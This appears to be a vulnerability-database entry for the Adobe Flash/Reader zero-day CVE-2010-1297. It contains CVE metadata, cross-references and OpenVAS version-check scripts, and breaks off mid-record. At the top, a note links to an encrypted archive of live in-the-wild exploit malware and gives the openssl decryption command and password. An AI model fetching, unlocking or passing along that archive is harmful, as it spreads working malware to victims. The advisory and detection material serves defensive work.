Adobe Flash and Reader - 0day Exploit PoC (from the wild)
2014-07-01T00:00:00
ID: SSV:68962
Type: seebug
Reporter: Root
Modified: 2014-07-01T00:00:00
Description
No description provided by source.
# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/
# File is malicious! Taken from the wild! Beware!
# To decrypt the file:
# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar
# Password is "edb" without the quotes.
NOTE: This was taken out of live malware and was not modified. BEWARE.
By visiting the following link, you agree that you are responsible for any damages that occur.
http://www.exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc
{"href": "https://www.seebug.org/vuldb/ssvid-68962", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Adobe Flash and Reader - 0day Exploit PoC (from the wild)", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-68962", "cvelist": ["CVE-2010-1297"], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n # Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is "edb" without the quotes.\r\n\r\nNOTE: This was taken out of live malware and was not modified. BEWARE.\r\n\r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n\r\nhttp://www.exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc\r\n\r\n\r\n\n ", "id": "SSV:68962", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:56:10", "reporter": "Root", "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2017-11-19T14:56:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1297"]}, {"type": "openvas", "idList": ["OPENVAS:902200", "OPENVAS:850135", "OPENVAS:1361412562310801361", "OPENVAS:902194", "OPENVAS:1361412562310801360", "OPENVAS:1361412562310902200", "OPENVAS:801360", "OPENVAS:801361", "OPENVAS:67656", "OPENVAS:1361412562310850135"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24038", "SECURITYVULNS:VULN:10921", "SECURITYVULNS:DOC:24282", "SECURITYVULNS:DOC:24039", "SECURITYVULNS:DOC:24043", "SECURITYVULNS:DOC:25153"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:90664", "PACKETSTORM:90665", "PACKETSTORM:93394"]}, {"type": "exploitpack", "idList": 
["EXPLOITPACK:8E576C4816C791FE420A43AC52B86332", "EXPLOITPACK:4125F09B17C03F68D9E1171B95C97590"]}, {"type": "saint", "idList": ["SAINT:4087FA9BA2E83B1761565A4E280BC32F", "SAINT:770782F23BE978D80AAD6E9F9088C70A", "SAINT:77C0093237F1AF8B89C92BAD6DF70E05"]}, {"type": "exploitdb", "idList": ["EDB-ID:16687", "EDB-ID:16614", "EDB-ID:13787"]}, {"type": "canvas", "idList": ["FLASH_NEWFUNCTION"]}, {"type": "cert", "idList": ["VU:486225"]}, {"type": "seebug", "idList": ["SSV:19759", "SSV:71128", "SSV:87100"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_NEWFUNCTION", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_NEWFUNCTION"]}, {"type": "threatpost", "idList": ["THREATPOST:40512FCC86A3D41C18AC58E1B95FF55E", "THREATPOST:F7E082438478997F07E358DD1CB69C57"]}, {"type": "nessus", "idList": ["SUSE_11_1_ACROREAD-100708.NASL", "SUSE_11_2_ACROREAD-100706.NASL", "REDHAT-RHSA-2010-0503.NASL", "ADOBE_ACROBAT_APSB10-15.NASL", "SUSE_11_ACROREAD_JA-100702.NASL", "ADOBE_READER_APSB10-15.NASL", "SUSE_11_0_ACROREAD-100708.NASL", "SUSE_ACROREAD-7087.NASL", "SUSE_ACROREAD_JA-7086.NASL", "SUSE_11_ACROREAD-100702.NASL"]}, {"type": "suse", "idList": ["SUSE-SA:2010:024", "SUSE-SA:2010:029"]}, {"type": "redhat", "idList": ["RHSA-2010:0470", "RHSA-2010:0464", "RHSA-2010:0503"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "freebsd", "idList": ["144E524A-77EB-11DF-AE06-001B2134EF46"]}, {"type": "gentoo", "idList": ["GLSA-201101-09", "GLSA-201009-05"]}], "modified": "2017-11-19T14:56:10", "rev": 2}, "vulnersScore": 8.5}, "references": []}
{"cve": [{"lastseen": "2020-12-09T19:34:38", "description": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64; Adobe AIR before 2.0.2.12610; and Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, related to authplay.dll and the ActionScript Virtual Machine 2 (AVM2) newfunction instruction, as exploited in the wild in June 2010.", "edition": 5, "cvss3": {}, "published": "2010-06-08T18:30:00", "title": "CVE-2010-1297", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1297"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", 
"cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:9.0.262.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2010-1297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1297", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.262.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\n remote code execution vulnerability.", "modified": "2018-12-04T00:00:00", "published": 
"2010-06-15T00:00:00", "id": "OPENVAS:1361412562310801361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801361", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_lin_jun10.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801361\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\", \"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code by tricking a user into opening a specially crafted PDF file.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.x to 9.3.2\n\n Adobe Flash Player version 9.0.x to 9.0.262 and 10.x through 10.0.45.2\");\n\n script_tag(name:\"insight\", value:\"The flaw is 
due to a memory corruption error in the\n 'libauthplay.so.0.0.0' library and 'SWF' file when processing ActionScript\n Virtual Machine 2 (AVM2) 'newfunction' instructions within Flash content in a PDF document.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe products and is prone to\n remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\n\n For Adobe Reader a patch was released by the Vendor, please see the references for more information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\npVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(pVer)\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n# Adobe Reader\narVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(arVer)\n{\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\n remote code execution vulnerability.", "modified": "2020-05-28T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:1361412562310801360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801360", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801360\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", 
value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code by tricking a user into opening a specially crafted PDF file.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader/Acrobat version 9.x to 9.3.2\n\n Adobe Flash Player version 9.0.x to 9.0.262 and 10.x to 10.0.45.2\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a memory corruption error in the 'authplay.dll'\n library and 'SWF' file when processing ActionScript Virtual Machine 2 (AVM2)\n 'newfunction' instructions within Flash content in a PDF document.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe products and is prone to\n remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\n\n For Adobe Reader additional updates has been released which are described in the referenced advisories.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player\",\n \"cpe:/a:adobe:acrobat\",\n \"cpe:/a:adobe:acrobat_reader\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_in_range(version:vers, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.45.2\")) {\n report = 
report_fixed_ver(installed_version:vers, fixed_version:\"10.1.53.64 or 9.0.277.0\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:acrobat\" || cpe == \"cpe:/a:adobe:acrobat_reader\") {\n if(version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.3.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"See references\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\nremote code execution vulnerability.", "modified": "2017-12-21T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:801360", "href": "http://plugins.openvas.org/nasl.php?oid=801360", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_win_jun10.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"For Adobe Flash Player,\nUpdate to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later,\nFor updates refer to http://www.adobe.com/support/flashplayer/downloads.html\n\nFor Adobe Reader\nVendor has released a patch for the issue, refer below link,\nhttp://www.adobe.com/support/security/advisories/apsa10-01.html\nFor updates refer to http://www.adobe.com/\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code by tricking a user into opening a specially crafted PDF file.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Reader/Acrobat version 9.x to 9.3.2\n\nAdobe Flash Player version 9.0.x to 9.0.262 and 10.x to 10.0.45.2\";\n\ntag_insight = \"The flaw is due to a memory corruption error in the 'authplay.dll'\nlibrary and 'SWF' file when processing ActionScript Virtual Machine 2 (AVM2)\n'newfunction' instructions within Flash content in a PDF document.\";\n\ntag_summary = \"This host is installed with Adobe products and is prone to\nremote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801360);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\");\n\n 
script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:flash_player\";\nif(pVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Grep for Adobe Acrobat version 9.0 to 9.3.2\n if(version_in_range(version:acVer, test_version:\"9.0\", test_version2:\"9.3.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\nif(arVer = get_app_version(cpe:CPE))\n{\n # Grep for Adobe Reader version 9.0 to 9.3.2\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T10:48:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\nremote code execution vulnerability.", "modified": "2017-06-29T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:801361", "href": "http://plugins.openvas.org/nasl.php?oid=801361", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_lin_jun10.nasl 6476 2017-06-29 07:32:00Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"For Adobe Flash Player,\nUpdate to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\nhttp://www.adobe.com/support/flashplayer/downloads.html\n\nFor Adobe Reader\nVendor has released a patch for the issue, refer below link,\nhttp://www.adobe.com/support/security/advisories/apsa10-01.html\nFor updates refer to http://www.adobe.com/\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code by tricking a user into opening a specially crafted PDF file.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Reader version 9.x to 9.3.2\nAdobe Flash Player version 9.0.x to 9.0.262 and 10.x through 10.0.45.2\";\n\ntag_insight = \"The flaw is due to a memory corruption error in the\n'libauthplay.so.0.0.0' library and 'SWF' file when processing ActionScript\nVirtual Machine 2 (AVM2) 'newfunction' instructions within Flash content in a\nPDF document.\";\n\ntag_summary = \"This host is installed with Adobe products and is prone to\nremote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801361);\n script_version(\"$Revision: 6476 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-29 09:32:00 +0200 (Thu, 29 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\");\n\n script_xref(name : \"URL\" , value 
